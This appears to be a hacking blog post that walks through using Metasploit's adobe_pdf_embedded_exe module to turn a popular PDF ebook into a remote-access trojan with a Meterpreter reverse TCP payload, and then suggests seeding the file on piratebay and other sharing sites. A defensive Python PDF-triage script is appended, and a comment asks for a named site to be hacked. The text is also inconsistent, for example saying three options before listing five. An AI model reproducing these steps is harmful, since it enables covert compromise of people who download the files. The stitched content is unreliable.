

In this post, we'll take a look at how hackers gain access to their target by using a PDF as a RAT.

A hacker's objective is to find an ebook that is popular, then inject it with a reverse TCP connection (or another of their preference). Once their target opens the ebook, although the target can read it as normal and with no issues, the hacker will have established a reverse TCP connection to their system.

The victim has now been hacked.

Let's go through how that is done.

First, let's get prepared on our Kali Linux System.
I like to start the service postgresql and open msfconsole, with one command:

sudo service postgresql start && sudo msfconsole

If this isn't necessary for you, just open msfconsole.
[Image: 1.png]

Now that's done, let's search for the PDF exploit that we are going to use. As you can see in the screenshot, I've added some filters to my search query that will narrow down the results.

[Image: 2.png]

Once that's done, we need to find:

Copy the full name, then tell msfconsole that we want to use it:

use exploit/windows/fileformat/adobe_pdf_embedded_exe

Now msfconsole should look like this.

[Image: 3.png]

Additionally, you can type info to find out more about this particular exploit. It's always worth doing this. It will provide useful links to sites that, if you're stuck, may help you.

[Image: 4.png]

Our second step is to set the payload that we are going to use. Let's make our RAT work on a Windows system by setting the following payload:

set PAYLOAD windows/meterpreter/reverse_tcp

[Image: 5.png]

If you would like the RAT to work on other systems, such as Android, type show payloads, then use the corresponding payload.

The next step is to check what information this exploit requires us to provide.
There are only 3.

EXITFUNC - change how the payload behaves (leave as it is)
LHOST - the IP address of the hacker (us)
LPORT - the port used by the hacker (us)
FILENAME - what we want to name our new PDF RAT
INFILENAME - the PDF that we are injecting

[Image: 6.png]

Now we need to set each option. You can also decide to add the payload at this phase if you prefer. If you re-type it, it doesn't matter.

[Image: 7.png]

Type run, then the PDF RAT will be created.
You will be informed about where it has been saved.
In the below image, you can see that mine was saved in:

However, I'm going to move it to a more suitable place, which is in the same folder as the original clean PDF (sup.pdf).

To do that, I visit the folder that contains the RAT (m8.pdf), right click inside the folder, open terminal, type ls to see the contents, then type cp to copy it to my preferred location:
cp <file name> /home/shellcartel/Desktop/

Now we could send this to our target, or if our target is anyone, we could upload it to sites like piratebay and other sharing sites.
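
Seen from the receiving side, the module name adobe_pdf_embedded_exe describes what ends up in the file: an executable embedded in an otherwise normal PDF. The triage check below is an added example, not part of the original post or of Metasploit; the indicator list, the constructed sample bytes and the verdict names are assumptions chosen for illustration.

```python
import re

# Name objects commonly checked when triaging a PDF (assumed list, in the
# style of tools such as pdfid; not taken from the original post).
INDICATORS = ("/EmbeddedFile", "/Launch", "/OpenAction", "/AA", "/JS", "/JavaScript")

# A PDF name is "/" followed by any bytes that are not whitespace or delimiters.
_NAME = re.compile(rb"/[^\x00\t\n\x0c\r ()<>\[\]{}/%]+")
_HEX = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize(name: bytes) -> str:
    """Decode #xx escapes so /L#61unch compares equal to /Launch."""
    return _HEX.sub(lambda m: bytes([int(m.group(1), 16)]), name).decode("latin-1")


def scan_pdf(data: bytes) -> dict:
    """Count indicator names in raw PDF bytes (compressed object streams are not expanded)."""
    counts = {k: 0 for k in INDICATORS}
    for m in _NAME.finditer(data):
        name = normalize(m.group(0))
        if name in counts:
            counts[name] += 1
    return counts


def verdict(counts: dict) -> str:
    """Flag files that both carry an attachment and can launch something."""
    if counts["/EmbeddedFile"] and counts["/Launch"]:
        return "quarantine"
    if any(counts.values()):
        return "review"
    return "clean"


# Constructed samples: minimal PDF-like fragments, not real documents.
CLEAN = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF"
SUSPECT = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 5 0 R >> endobj\n"
           b"4 0 obj << /Type /EmbeddedFile /Length 0 >> stream\nendstream endobj\n"
           b"5 0 obj << /S /L#61unch /Win << /F (placeholder.exe) >> >> endobj\n%%EOF")

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("suspect", SUSPECT)):
        c = scan_pdf(blob)
        print(label, verdict(c), {k: v for k, v in c.items() if v})
```

Indicators stored inside compressed object streams are not seen by this check, so a "clean" result on raw bytes only means nothing was found in the uncompressed parts of the file.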

Post a Comment

Can you hack assignmenthelp4medotcom? How much time will it take you?


